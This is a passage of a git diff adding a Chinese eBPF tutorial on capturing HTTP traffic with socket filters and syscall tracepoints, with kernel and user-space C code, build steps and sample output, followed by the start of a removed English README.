syscall 追踪的对比 + +| 项目 | eBPF Socket Filter | eBPF Syscall Tracing | +|------|--------------------|----------------------| +| **操作层** | 套接字层,主要处理从套接字接收或发送的网络数据包 | 系统调用层,监视和可能更改应用程序发出的系统调用的行为 | +| **主要用途** | 主要用于网络数据包的过滤、监控和操作 | 用于性能分析、安全监控和系统调用交互的调试 | +| **粒度** | 专注于单个网络数据包 | 可以监视与网络无关的广泛的系统活动 | +| **追踪 HTTP 流量** | 可以用于过滤和捕获通过套接字传递的 HTTP 数据包 | 可以跟踪与网络操作相关的系统调用 | + +总之,eBPF 的 socket filter 和 syscall 追踪都可以用于追踪 HTTP 流量,但 socket filters 更直接且更适合此目的。然而,如果您对应用程序如何与系统交互的更广泛的上下文感兴趣(例如,哪些系统调用导致了 HTTP 流量),那么系统调用跟踪将是非常有价值的。在许多高级的可观察性设置中,这两种工具可能会同时使用,以提供系统和网络行为的全面视图。 + +## 使用 eBPF socket filter 来捕获 HTTP 流量 + +eBPF 代码由用户态和内核态组成,这里主要关注于内核态代码。这是使用 eBPF socket filter 技术来在内核中捕获HTTP流量的主要逻辑,完整代码如下: + +```c +SEC("socket") +int socket_handler(struct __sk_buff *skb) +{ + struct so_event *e; + __u8 verlen; + __u16 proto; + __u32 nhoff = ETH_HLEN; + __u32 ip_proto = 0; + __u32 tcp_hdr_len = 0; + __u16 tlen; + __u32 payload_offset = 0; + __u32 payload_length = 0; + __u8 hdr_len; + + bpf_skb_load_bytes(skb, 12, &proto, 2); + proto = __bpf_ntohs(proto); + if (proto != ETH_P_IP) + return 0; + + if (ip_is_fragment(skb, nhoff)) + return 0; + + // ip4 header lengths are variable + // access ihl as a u8 (linux/include/linux/skbuff.h) + bpf_skb_load_bytes(skb, ETH_HLEN, &hdr_len, sizeof(hdr_len)); + hdr_len &= 0x0f; + hdr_len *= 4; + + /* verify hlen meets minimum size requirements */ + if (hdr_len < sizeof(struct iphdr)) + { + return 0; + } + + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1); + + if (ip_proto != IPPROTO_TCP) + { + return 0; + } + + tcp_hdr_len = nhoff + hdr_len; + bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1); + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen)); + + __u8 doff; + bpf_skb_load_bytes(skb, tcp_hdr_len + offsetof(struct __tcphdr, ack_seq) + 4, &doff, sizeof(doff)); // read the first byte past __tcphdr->ack_seq, we can't do offsetof bit fields + doff &= 0xf0; // clean-up res1 + doff >>= 4; // move the upper 4 bits to low + doff *= 4; // convert to bytes length + + payload_offset = ETH_HLEN + hdr_len + doff; + payload_length = __bpf_ntohs(tlen) - hdr_len - doff; + + char line_buffer[7]; + if (payload_length < 7 || payload_offset < 0) + { + return 0; + } + bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7); + bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer); + if (bpf_strncmp(line_buffer, 3, "GET") != 0 
&& + bpf_strncmp(line_buffer, 4, "POST") != 0 && + bpf_strncmp(line_buffer, 3, "PUT") != 0 && + bpf_strncmp(line_buffer, 6, "DELETE") != 0 && + bpf_strncmp(line_buffer, 4, "HTTP") != 0) + { + return 0; + } + + /* reserve sample from BPF ringbuf */ + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (!e) + return 0; + + e->ip_proto = ip_proto; + bpf_skb_load_bytes(skb, nhoff + hdr_len, &(e->ports), 4); + e->pkt_type = skb->pkt_type; + e->ifindex = skb->ifindex; + + e->payload_length = payload_length; + bpf_skb_load_bytes(skb, payload_offset, e->payload, MAX_BUF_SIZE); + + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, saddr), &(e->src_addr), 4); + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, daddr), &(e->dst_addr), 4); + bpf_ringbuf_submit(e, 0); + + return skb->len; +} +``` + +当分析这段eBPF程序时,我们将按照每个代码块的内容来详细解释,并提供相关的背景知识: + +```c +SEC("socket") +int socket_handler(struct __sk_buff *skb) +{ + // ... +} +``` + +这是eBPF程序的入口点,它定义了一个名为 `socket_handler` 的函数,它会被内核用于处理传入的网络数据包。这个函数位于一个名为 `socket` 的 eBPF 节(section)中,表明这个程序用于套接字处理。 + +```c +struct so_event *e; +__u8 verlen; +__u16 proto; +__u32 nhoff = ETH_HLEN; +__u32 ip_proto = 0; +__u32 tcp_hdr_len = 0; +__u16 tlen; +__u32 payload_offset = 0; +__u32 payload_length = 0; +__u8 hdr_len; +``` + +在这个代码块中,我们定义了一些变量来存储在处理数据包时需要的信息。这些变量包括了`struct so_event *e`用于存储事件信息,`verlen`、`proto`、`nhoff`、`ip_proto`、`tcp_hdr_len`、`tlen`、`payload_offset`、`payload_length`、`hdr_len`等用于存储数据包信息的变量。 + +- `struct so_event *e;`:这是一个指向`so_event`结构体的指针,用于存储捕获到的事件信息。该结构体的具体定义在程序的其他部分。 +- `__u8 verlen;`、`__u16 proto;`、`__u32 nhoff = ETH_HLEN;`:这些变量用于存储各种信息,例如协议类型、数据包偏移量等。`nhoff`初始化为以太网帧头部的长度,通常为14字节,因为以太网帧头部包括目标MAC地址、源MAC地址和帧类型字段。 +- `__u32 ip_proto = 0;`:这个变量用于存储IP协议的类型,初始化为0。 +- `__u32 tcp_hdr_len = 0;`:这个变量用于存储TCP头部的长度,初始化为0。 +- `__u16 tlen;`:这个变量用于存储IP数据包的总长度。 +- `__u32 payload_offset = 0;`、`__u32 payload_length = 0;`:这两个变量用于存储HTTP请求的载荷(payload)的偏移量和长度。 +- `__u8 hdr_len;`:这个变量用于存储IP头部的长度。 + +```c +bpf_skb_load_bytes(skb, 12, &proto, 2); +proto = __bpf_ntohs(proto); +if (proto != ETH_P_IP) + return 0; +``` + +在这里,代码从数据包中加载了以太网帧的类型字段,这个字段告诉我们数据包使用的网络层协议。然后,使用`__bpf_ntohs`函数将网络字节序的类型字段转换为主机字节序。接下来,代码检查类型字段是否等于IPv4的以太网帧类型(0x0800)。如果不等于,说明这个数据包不是IPv4数据包,直接返回0,放弃处理。 + +这里需要了解以下几个概念: + +- 以太网帧(Ethernet Frame):是数据链路层(第二层)的协议,用于在局域网中传输数据帧。以太网帧通常包括目标MAC地址、源MAC地址和帧类型字段。 +- 网络字节序(Network Byte Order):网络协议通常使用大端字节序(Big-Endian)来表示数据。因此,需要将从网络中接收到的数据转换为主机字节序,以便在主机上正确解释数据。 +- IPv4帧类型(ETH_P_IP):表示以太网帧中包含的协议类型字段,0x0800表示IPv4。 + +```c +if (ip_is_fragment(skb, nhoff)) + return 0; +``` + +这一部分的代码检查是否处理IP分片。IP分片是将较大的IP数据包分割成多个小片段以进行传输的机制。在这里,如果数据包是IP分片,则直接返回0,表示不处理分片,只处理完整的数据包。 + +```c +static inline int ip_is_fragment(struct __sk_buff *skb, __u32 nhoff) +{ + __u16 frag_off; + + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2); + frag_off = __bpf_ntohs(frag_off); + return frag_off & (IP_MF | IP_OFFSET); +} +``` + +上述代码是一个辅助函数,用于检查传入的IPv4数据包是否为IP分片。IP分片是一种机制,当IP数据包的大小超过了网络的最大传输单元(MTU),路由器会将其分割成多个较小的片段,以便在网络上进行传输。这个函数的目的是检查数据包的分片标志(Fragmentation Flag)以及片偏移(Fragment Offset)字段,以确定是否为分片。 + +下面是代码的逐行解释: + +1. `__u16 frag_off;`:定义一个16位无符号整数变量`frag_off`,用于存储片偏移字段的值。 +2. `bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2);`:这行代码使用`bpf_skb_load_bytes`函数从数据包中加载IPv4头部的片偏移字段(`frag_off`),并加载2个字节。`nhoff`是IPv4头部在数据包中的偏移量,`offsetof(struct iphdr, frag_off)`用于计算片偏移字段在IPv4头部中的偏移量。 +3. `frag_off = __bpf_ntohs(frag_off);`:将加载的片偏移字段从网络字节序(Big-Endian)转换为主机字节序。网络协议通常使用大端字节序表示数据,而主机可能使用大端或小端字节序。这里将片偏移字段转换为主机字节序,以便进一步处理。 +4. 
`return frag_off & (IP_MF | IP_OFFSET);`:这行代码通过使用位运算检查片偏移字段的值,以确定是否为IP分片。具体来说,它使用位与运算符`&`将片偏移字段与两个标志位进行位与运算: + - `IP_MF`:表示"更多分片"标志(More Fragments)。如果这个标志位被设置为1,表示数据包是分片的一部分,还有更多分片。 + - `IP_OFFSET`:表示片偏移字段。如果片偏移字段不为0,表示数据包是分片的一部分,且具有片偏移值。 + 如果这两个标志位中的任何一个被设置为1,那么结果就不为零,说明数据包是IP分片。如果都为零,说明数据包不是分片。 + +需要注意的是,IP头部的片偏移字段以8字节为单位,所以实际的片偏移值需要左移3位来得到字节偏移。此外,IP头部的"更多分片"标志(IP_MF)表示数据包是否有更多的分片,通常与片偏移字段一起使用来指示整个数据包的分片情况。这个函数只关心这两个标志位,如果其中一个标志被设置,就认为是IP分片。 + +```c +bpf_skb_load_bytes(skb, ETH_HLEN, &hdr_len, sizeof(hdr_len)); +hdr_len &= 0x0f; +hdr_len *= 4; +``` + +这一部分的代码从数据包中加载IP头部的长度字段。IP头部长度字段包含了IP头部的长度信息,以4字节为单位,需要将其转换为字节数。这里通过按位与和乘以4来进行转换。 + +需要了解: + +- IP头部(IP Header):IP头部包含了关于数据包的基本信息,如源IP地址、目标IP地址、协议类型和头部校验和等。头部长度字段(IHL,Header Length)表示IP头部的长度,以4字节为单位,通常为20字节(5个4字节的字)。 + +```c +if (hdr_len < sizeof(struct iphdr)) +{ + return 0; +} +``` + +这段代码检查IP头部的长度是否满足最小长度要求,通常IP头部的最小长度是20字节。如果IP头部的长度小于20字节,说明数据包不完整或损坏,直接返回0,放弃处理。 + +需要了解: + +- `struct iphdr`:这是Linux内核中定义的结构体,表示IPv4头部的格式。它包括了版本、头部长度、服务类型、总长度、 + +标识符、标志位、片偏移、生存时间、协议、头部校验和、源IP地址和目标IP地址等字段。 + +```c +bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1); +if (ip_proto != IPPROTO_TCP) +{ + return 0; +} +``` + +在这里,代码从数据包中加载IP头部中的协议字段,以确定数据包使用的传输层协议。然后,它检查协议字段是否为TCP协议(IPPROTO_TCP)。如果不是TCP协议,说明不是HTTP请求或响应,直接返回0。 + +需要了解: + +- 传输层协议:IP头部中的协议字段指示了数据包所使用的传输层协议,例如TCP、UDP或ICMP。 + +```c +tcp_hdr_len = nhoff + hdr_len; +``` + +这行代码计算了TCP头部的偏移量。它将以太网帧头部的长度(`nhoff`)与IP头部的长度(`hdr_len`)相加,得到TCP头部的起始位置。 + +```c +bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1); +``` + +这行代码从数据包中加载TCP头部的第一个字节,该字节包含了TCP头部长度信息。这个长度字段以4字节为单位,需要进行后续的转换。 + +```c +bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen)); +``` + +这行代码从数据包中加载IP头部的总长度字段。IP头部总长度字段表示整个IP数据包的长度,包括IP头部和数据部分。 + +```c +__u8 doff; +bpf_skb_load_bytes(skb, tcp_hdr_len + offsetof(struct __tcphdr, ack_seq) + 4, &doff, sizeof(doff)); +doff &= 0xf0; +doff >>= 4; +doff *= 4; +``` + +这段代码用于计算TCP头部的长度。它加载TCP头部中的数据偏移字段(Data Offset,也称为头部长度字段),该字段表示TCP头部的长度以4字节为单位。代码将偏移字段的高四位清零,然后将其右移4位,最后乘以4,得到TCP头部的实际长度。 + +需要了解: + +- TCP头部(TCP Header):TCP头部包含了TCP协议相关的信息,如源端口、目标端口、序列号、确认号、标志位(如SYN、ACK、FIN等)、窗口大小和校验和等。 + +```c +payload_offset = ETH_HLEN + hdr_len + doff; +payload_length = __bpf_ntohs(tlen) - hdr_len - doff; +``` + +这两行代码计算HTTP请求的载荷(payload)的偏移量和长度。它们将以太网帧头部长度、IP头部长度和TCP头部长度相加,得到HTTP请求的数据部分的偏移量,然后通过减去总长度、IP头部长度和TCP头部长度,计算出HTTP请求数据的长度。 + +需要了解: + +- HTTP请求载荷(Payload):HTTP请求中包含的实际数据部分,通常是HTTP请求头和请求体。 + +```c +char line_buffer[7]; +if (payload_length < 7 || payload_offset < 0) +{ + return 0; +} +bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7); +bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer); +``` + +这部分代码用于加载HTTP请求行的前7个字节,存储在名为`line_buffer`的字符数组中。然后,它检查HTTP请求数据的长度是否小于7字节或偏移量是否为负数,如果满足这些条件,说明HTTP请求不完整,直接返回0。最后,它使用`bpf_printk`函数将HTTP请求行的内容打印到内核日志中,以供调试和分析。 + +```c +if (bpf_strncmp(line_buffer, 3, "GET") != 0 && + bpf_strncmp(line_buffer, 4, "POST") != 0 && + bpf_strncmp(line_buffer, 3, "PUT") != 0 && + bpf_strncmp(line_buffer, 6, "DELETE") != 0 && + bpf_strncmp(line_buffer, 4, "HTTP") != 0) +{ + return 0; +} +``` + +> 注意:bpf_strncmp 这个内核 helper 在 5.17 版本中才被引入,如果你的内核版本低于 5.17,可以手动匹配字符串来实现相同的功能。 + +这段代码使用`bpf_strncmp`函数比较`line_buffer`中的数据与HTTP请求方法(GET、POST、PUT、DELETE、HTTP)是否匹配。如果不匹配,说明不是HTTP请求,直接返回0,放弃处理。 + +```c +e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); +if (!e) + return 0; +``` + +这部分代码尝试从BPF环形缓冲区中保留一块内存以存储事件信息。如果无法保留内存块,返回0。BPF环形缓冲区用于在eBPF程序和用户空间之间传递事件数据。 + +需要了解: + +- 
BPF环形缓冲区:BPF环形缓冲区是一种在eBPF程序和用户空间之间传递数据的机制。它可以用来存储事件信息,以便用户空间应用程序进行进一步处理或分析。 + +```c +e->ip_proto = ip_proto; +bpf_skb_load_bytes(skb, nhoff + hdr_len, &(e->ports), 4); +e->pkt_type = skb->pkt_type; +e->ifindex = skb->ifindex; + +e->payload_length = payload_length; +bpf_skb_load_bytes(skb, payload_offset, e->payload, MAX_BUF_SIZE); + +bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, saddr), &(e->src_addr), 4); +bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, daddr), &(e->dst_addr), 4); +bpf_ringbuf_submit(e, 0); + +return skb->len; +``` + +最后,这段代码将捕获到的事件信息存储在`e`结构体中,并将 + +其提交到BPF环形缓冲区。它包括了捕获的IP协议、源端口和目标端口、数据包类型、接口索引、载荷长度、源IP地址和目标IP地址等信息。最后,它返回数据包的长度,表示成功处理了数据包。 + +这段代码主要用于将捕获的事件信息存储起来,以便后续的处理和分析。 BPF环形缓冲区用于将这些信息传递到用户空间,供用户空间应用程序进一步处理或记录。 + +总结:这段eBPF程序的主要任务是捕获HTTP请求,它通过解析数据包的以太网帧、IP头部和TCP头部来确定数据包是否包含HTTP请求,并将有关请求的信息存储在`so_event`结构体中,然后提交到BPF环形缓冲区。这是一种高效的方法,可以在内核层面捕获HTTP流量,适用于网络监控和安全分析等应用。 + +### 潜在缺陷 + +上述代码也存在一些潜在的缺陷,其中一个主要缺陷是它无法处理跨多个数据包的URL。 + +- 跨包URL:代码中通过解析单个数据包来检查HTTP请求中的URL,如果HTTP请求的URL跨足够多的数据包,那么只会检查第一个数据包中的URL部分。这会导致丢失或部分记录那些跨多个数据包的长URL。 + +解决这个问题的方法通常需要对多个数据包进行重新组装,以还原完整的HTTP请求。这可能需要在eBPF程序中实现数据包的缓存和组装逻辑,并在检测到HTTP请求结束之前等待并收集所有相关数据包。这需要更复杂的逻辑和额外的内存来处理跨多个数据包的情况。 + +### 用户态代码 + +用户态代码的主要目的是创建一个原始套接字(raw socket),然后将先前在内核中定义的eBPF程序附加到该套接字上,从而允许eBPF程序捕获和处理从该套接字接收到的网络数据包,例如: + +```c + /* Create raw socket for localhost interface */ + sock = open_raw_sock(interface); + if (sock < 0) { + err = -2; + fprintf(stderr, "Failed to open raw socket\n"); + goto cleanup; + } + + /* Attach BPF program to raw socket */ + prog_fd = bpf_program__fd(skel->progs.socket_handler); + if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))) { + err = -3; + fprintf(stderr, "Failed to attach to raw socket\n"); + goto cleanup; + } +``` + +1. `sock = open_raw_sock(interface);`:这行代码调用了一个自定义的函数`open_raw_sock`,该函数用于创建一个原始套接字。原始套接字允许用户态应用程序直接处理网络数据包,而不经过协议栈的处理。函数`open_raw_sock`可能需要一个参数 `interface`,用于指定网络接口,以便确定从哪个接口接收数据包。如果创建套接字失败,它将返回一个负数,否则返回套接字的文件描述符`sock`。 +2. 如果`sock`的值小于0,表示打开原始套接字失败,那么将`err`设置为-2,并在标准错误流上输出一条错误信息。 +3. `prog_fd = bpf_program__fd(skel->progs.socket_handler);`:这行代码获取之前在eBPF程序定义中的套接字过滤器程序(`socket_handler`)的文件描述符,以便后续将它附加到套接字上。`skel`是一个eBPF程序对象的指针,可以通过它来访问程序集合。 +4. `setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))`:这行代码使用`setsockopt`系统调用将eBPF程序附加到原始套接字。它设置了`SO_ATTACH_BPF`选项,将eBPF程序的文件描述符传递给该选项,以便内核知道要将哪个eBPF程序应用于这个套接字。如果附加成功,套接字将开始捕获和处理从中接收到的网络数据包。 +5. 如果`setsockopt`失败,它将`err`设置为-3,并在标准错误流上输出一条错误信息。 + +### 编译运行 + +完整的源代码可以在 中找到。关于如何安装依赖,请参考: 编译运行上述代码: + +```console +$ git submodule update --init --recursive +$ make + BPF .output/sockfilter.bpf.o + GEN-SKEL .output/sockfilter.skel.h + CC .output/sockfilter.o + BINARY sockfilter +$ sudo ./sockfilter +... +``` + +在另外一个窗口中,使用 python 启动一个简单的 web server: + +```console +python3 -m http.server +Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... +127.0.0.1 - - [18/Sep/2023 01:05:52] "GET / HTTP/1.1" 200 - +``` + +可以使用 curl 发起请求: + +```c +$ curl http://0.0.0.0:8000/ + + + + +Directory listing for / +.... +``` + +在 eBPF 程序中,可以看到打印出了 HTTP 请求的内容: + +```console +127.0.0.1:34552(src) -> 127.0.0.1:8000(dst) +payload: GET / HTTP/1.1 +Host: 0.0.0.0:8000 +User-Agent: curl/7.88.1 +... +127.0.0.1:8000(src) -> 127.0.0.1:34552(dst) +payload: HTTP/1.0 200 OK +Server: SimpleHTTP/0.6 Python/3.11.4 +... 
+``` + +分别包含了请求和响应的内容。 + +## 使用 eBPF syscall tracepoint 来捕获 HTTP 流量 + +eBPF 提供了一种强大的机制,允许我们在内核级别追踪系统调用。在这个示例中,我们将使用 eBPF 追踪 accept 和 read 系统调用,以捕获 HTTP 流量。由于篇幅有限,这里我们仅仅对代码框架做简要的介绍。 + +```c +struct +{ + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 4096); + __type(key, u64); + __type(value, struct accept_args_t); +} active_accept_args_map SEC(".maps"); + +// 定义在 accept 系统调用入口的追踪点 +SEC("tracepoint/syscalls/sys_enter_accept") +int sys_enter_accept(struct trace_event_raw_sys_enter *ctx) +{ + u64 id = bpf_get_current_pid_tgid(); + // ... 获取和存储 accept 调用的参数 + bpf_map_update_elem(&active_accept_args_map, &id, &accept_args, BPF_ANY); + return 0; +} + +// 定义在 accept 系统调用退出的追踪点 +SEC("tracepoint/syscalls/sys_exit_accept") +int sys_exit_accept(struct trace_event_raw_sys_exit *ctx) +{ + // ... 处理 accept 调用的结果 + struct accept_args_t *args = + bpf_map_lookup_elem(&active_accept_args_map, &id); + // ... 获取和存储 accept 调用获得的 socket 文件描述符 + __u64 pid_fd = ((__u64)pid << 32) | (u32)ret_fd; + bpf_map_update_elem(&conn_info_map, &pid_fd, &conn_info, BPF_ANY); + // ... +} + +struct +{ + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 4096); + __type(key, u64); + __type(value, struct data_args_t); +} active_read_args_map SEC(".maps"); + +// 定义在 read 系统调用入口的追踪点 +SEC("tracepoint/syscalls/sys_enter_read") +int sys_enter_read(struct trace_event_raw_sys_enter *ctx) +{ + // ... 获取和存储 read 调用的参数 + bpf_map_update_elem(&active_read_args_map, &id, &read_args, BPF_ANY); + return 0; +} + +// 辅助函数,检查是否为 HTTP 连接 +static inline bool is_http_connection(const char *line_buffer, u64 bytes_count) +{ + // ... 检查数据是否为 HTTP 请求或响应 +} + +// 辅助函数,处理读取的数据 +static inline void process_data(struct trace_event_raw_sys_exit *ctx, + u64 id, const struct data_args_t *args, u64 bytes_count) +{ + // ... 处理读取的数据,检查是否为 HTTP 流量,并发送事件 + if (is_http_connection(line_buffer, bytes_count)) + { + // ... + bpf_probe_read_kernel(&event.msg, read_size, args->buf); + // ... + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, + &event, sizeof(struct socket_data_event_t)); + } +} + +// 定义在 read 系统调用退出的追踪点 +SEC("tracepoint/syscalls/sys_exit_read") +int sys_exit_read(struct trace_event_raw_sys_exit *ctx) +{ + // ... 处理 read 调用的结果 + struct data_args_t *read_args = bpf_map_lookup_elem(&active_read_args_map, &id); + if (read_args != NULL) + { + process_data(ctx, id, read_args, bytes_count); + } + // ... 
+ return 0; +} + +char _license[] SEC("license") = "GPL"; +``` + +这段代码简要展示了如何使用eBPF追踪Linux内核中的系统调用来捕获HTTP流量。以下是对代码的hook位置和流程的详细解释,以及需要hook哪些系统调用来实现完整的请求追踪: + +### **Hook 位置和流程** + +- 该代码使用了eBPF的Tracepoint功能,具体来说,它定义了一系列的eBPF程序,并将它们绑定到了特定的系统调用的Tracepoint上,以捕获这些系统调用的入口和退出事件。 + +- 首先,它定义了两个eBPF哈希映射(`active_accept_args_map`和`active_read_args_map`)来存储系统调用参数。这些映射用于跟踪`accept`和`read`系统调用。 + +- 接着,它定义了多个Tracepoint追踪程序,其中包括: + - `sys_enter_accept`:定义在`accept`系统调用的入口处,用于捕获`accept`系统调用的参数,并将它们存储在哈希映射中。 + - `sys_exit_accept`:定义在`accept`系统调用的退出处,用于处理`accept`系统调用的结果,包括获取和存储新的套接字文件描述符以及建立连接的相关信息。 + - `sys_enter_read`:定义在`read`系统调用的入口处,用于捕获`read`系统调用的参数,并将它们存储在哈希映射中。 + - `sys_exit_read`:定义在`read`系统调用的退出处,用于处理`read`系统调用的结果,包括检查读取的数据是否为HTTP流量,如果是,则发送事件。 + +- 在`sys_exit_accept`和`sys_exit_read`中,还涉及一些数据处理和事件发送的逻辑,例如检查数据是否为HTTP连接,组装事件数据,并使用`bpf_perf_event_output`将事件发送到用户空间供进一步处理。 + +### **需要 Hook 的完整系统调用** + +要实现完整的HTTP请求追踪,通常需要hook的系统调用包括: + +- `socket`:用于捕获套接字创建,以追踪新的连接。 +- `bind`:用于获取绑定的端口信息。 +- `listen`:用于开始监听连接请求。 +- `accept`:用于接受连接请求,获取新的套接字文件描述符。 +- `read`:用于捕获接收到的数据,以检查其中是否包含 HTTP 请求。 +- `write`:用于捕获发送的数据,以检查其中是否包含 HTTP 响应。 + +上述代码已经涵盖了`accept`和`read`系统调用的追踪。要完整实现HTTP请求的追踪,还需要hook其他系统调用,并实现相应的逻辑来处理这些系统调用的参数和结果。 + +完整的源代码可以在 中找到。 + +## 总结 + +在当今复杂的技术环境中,系统的可观测性变得至关重要,特别是在微服务和云原生应用程序的背景下。本文探讨了如何利用eBPF技术来追踪七层协议,以及在这个过程中可能面临的挑战和解决方案。以下是对本文内容的总结: + +1. **背景介绍**: + - 现代应用程序通常由多个微服务和分布式组件组成,因此观测整个系统的行为至关重要。 + - 七层协议(如HTTP、gRPC、MQTT等)提供了深入了解应用程序交互的详细信息,但监控这些协议通常具有挑战性。 + +2. **eBPF技术的作用**: + - eBPF允许开发者在不修改或插入应用程序代码的情况下,深入内核层来实时观测和分析系统行为。 + - eBPF技术为监控七层协议提供了一个强大的工具,特别适用于微服务环境。 + +3. **追踪七层协议**: + - 本文介绍了如何追踪HTTP等七层协议的挑战,包括协议的复杂性和动态性。 + - 传统的网络监控工具难以应对七层协议的复杂性。 + +4. **eBPF的应用**: + - eBPF提供两种主要方法来追踪七层协议:socket filter和syscall trace。 + - 这两种方法可以帮助捕获HTTP等协议的网络请求数据,并分析它们。 + +5. **eBPF实践教程**: + - 本文提供了一个实际的eBPF教程,演示如何使用eBPF socket filter或syscall trace来捕获和分析HTTP流量。 + - 教程内容包括开发eBPF程序、使用eBPF工具链和实施HTTP请求的追踪。 + +通过这篇文章,读者可以获得深入了解如何使用eBPF技术来追踪七层协议,尤其是HTTP流量的知识。这将有助于更好地监控和分析网络流量,从而提高应用程序性能和安全性。如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +> 原文地址: 转载请注明出处。 diff --git a/src/23-http/README_en.md b/src/23-http/README_en.md deleted file mode 100644 index a17c8ed..0000000 --- a/src/23-http/README_en.md +++ /dev/null @@ -1,639 +0,0 @@ -# L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints - -In today's technology landscape, with the rise of microservices, cloud-native applications, and complex distributed systems, observability of systems has become a crucial factor in ensuring their health, performance, and security. Especially in a microservices architecture, application components may be distributed across multiple containers and servers, making traditional monitoring methods often insufficient to provide the depth and breadth needed to fully understand the behavior of the system. This is where observing seven-layer protocols such as HTTP, gRPC, MQTT, and more becomes particularly important. - -Seven-layer protocols provide detailed insights into how applications interact with other services and components. In a microservices environment, understanding these interactions is vital, as they often serve as the root causes of performance bottlenecks, failures, and security issues. However, monitoring these protocols is not a straightforward task. Traditional network monitoring tools like tcpdump, while effective at capturing network traffic, often fall short when dealing with the complexity and dynamism of seven-layer protocols. 
- -This is where eBPF (extended Berkeley Packet Filter) technology comes into play. eBPF allows developers and operators to delve deep into the kernel layer, observing and analyzing system behavior in real-time without the need to modify or insert instrumentation into application code. This presents a unique opportunity to handle application layer traffic more simply and efficiently, particularly in microservices environments. - -In this tutorial, we will delve into the following: - -- Tracking seven-layer protocols such as HTTP and the challenges associated with them. -- eBPF's socket filter and syscall tracing: How these two technologies assist in tracing HTTP network request data at different kernel layers, and the advantages and limitations of each. -- eBPF practical tutorial: How to develop an eBPF program and utilize eBPF socket filter or syscall tracing to capture and analyze HTTP traffic. - -As network traffic increases and applications grow in complexity, gaining a deeper understanding of seven-layer protocols becomes increasingly important. Through this tutorial, you will acquire the necessary knowledge and tools to more effectively monitor and analyze your network traffic, ultimately enhancing the performance of your applications and servers. - -This article is part of the eBPF Developer Tutorial, and for more detailed content, you can visit [here](https://eunomia.dev/tutorials/). The source code is available on the [GitHub repository](https://github.com/eunomia-bpf/bpf-developer-tutorial). - -## Challenges in Tracking HTTP, HTTP/2, and Other Seven-Layer Protocols - -In the modern networking environment, seven-layer protocols extend beyond just HTTP. In fact, there are many seven-layer protocols such as HTTP/2, gRPC, MQTT, WebSocket, AMQP, and SMTP, each serving critical roles in various application scenarios. These protocols provide detailed insights into how applications interact with other services and components. However, tracking these protocols is not a simple task, especially within complex distributed systems. - -1. **Diversity and Complexity**: Each seven-layer protocol has its specific design and workings. For example, gRPC utilizes HTTP/2 as its transport protocol and supports multiple languages, while MQTT is a lightweight publish/subscribe messaging transport protocol designed for low-bandwidth and unreliable networks. - -2. **Dynamism**: Many seven-layer protocols are dynamic, meaning their behavior can change based on network conditions, application requirements, or other factors. - -3. **Encryption and Security**: With increased security awareness, many seven-layer protocols employ encryption technologies such as TLS/SSL. This introduces additional challenges for tracking and analysis, as decrypting traffic is required for in-depth examination. - -4. **High-Performance Requirements**: In high-traffic production environments, capturing and analyzing traffic for seven-layer protocols can impact system performance. Traditional network monitoring tools may struggle to handle a large number of concurrent sessions. - -5. **Data Completeness and Continuity**: Unlike tools like tcpdump, which capture individual packets, tracking seven-layer protocols requires capturing complete sessions, which may involve multiple packets. This necessitates tools capable of correctly reassembling and parsing these packets to provide a continuous session view. - -6. 
**Code Intrusiveness**: To gain deeper insights into the behavior of seven-layer protocols, developers may need to modify application code to add monitoring functionalities. This not only increases development and maintenance complexity but can also impact application performance. - -As mentioned earlier, eBPF provides a powerful solution, allowing us to capture and analyze seven-layer protocol traffic in the kernel layer without modifying application code. This approach not only offers insights into system behavior but also ensures optimal performance and efficiency. This is why eBPF has become the preferred technology for modern observability tools, especially in production environments that demand high performance and low latency. - -## eBPF Socket Filter vs. Syscall Tracing: In-Depth Analysis and Comparison - -### **eBPF Socket Filter** - -**What Is It?** -eBPF socket filter is an extension of the classic Berkeley Packet Filter (BPF) that allows for more advanced packet filtering directly within the kernel. It operates at the socket layer, enabling fine-grained control over which packets are processed by user-space applications. - -**Key Features:** - -- **Performance**: By handling packets directly within the kernel, eBPF socket filters reduce the overhead of context switches between user and kernel spaces. -- **Flexibility**: eBPF socket filters can be attached to any socket, providing a universal packet filtering mechanism for various protocols and socket types. -- **Programmability**: Developers can write custom eBPF programs to define complex filtering logic beyond simple packet matching. - -**Use Cases:** - -- **Traffic Control**: Restrict or prioritize traffic based on custom conditions. -- **Security**: Discard malicious packets before they reach user-space applications. -- **Monitoring**: Capture specific packets for analysis without affecting other traffic. - -### **eBPF Syscall Tracing** - -**What Is It?** -System call tracing using eBPF allows monitoring and manipulation of system calls made by applications. System calls are the primary mechanism through which user-space applications interact with the kernel, making tracing them a valuable way to understand application behavior. - -**Key Features:** - -- **Granularity**: eBPF allows tracing specific system calls, even specific parameters within those system calls. -- **Low Overhead**: Compared to other tracing methods, eBPF syscall 